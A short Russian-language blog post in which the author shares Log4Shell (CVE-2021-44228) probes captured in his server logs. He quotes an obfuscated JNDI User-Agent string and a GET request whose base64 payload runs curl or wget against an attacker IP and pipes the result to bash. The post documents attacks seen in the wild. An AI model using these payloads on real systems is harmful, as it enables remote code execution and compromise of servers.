igor (ico) wrote,
igor
ico

глядя в логи

Нонче популярно стало такие юзер-агенты ставить :)
"${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"

Началось аккурат 10 декабря после широкой публикации CVE-2021-44228 :)
Есть секурити-сканнеры, а есть и некие ip-одиночки:
"GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMjQzLjUzLjEwODo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMjQzLjUzLjEwODo4MCl8YmFzaA==}"

Желающие могут расшифровать base64 :)
там curl + wget и результат в bash exec
ps:
xkcd_14_r
https://xkcd.com/2347/
Tags: it, security
Subscribe

  • Post a new comment

    Error

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

    When you submit the form an invisible reCAPTCHA check will be performed.
    You must follow the Privacy Policy and Google Terms of use.
    Help
  • 4 comments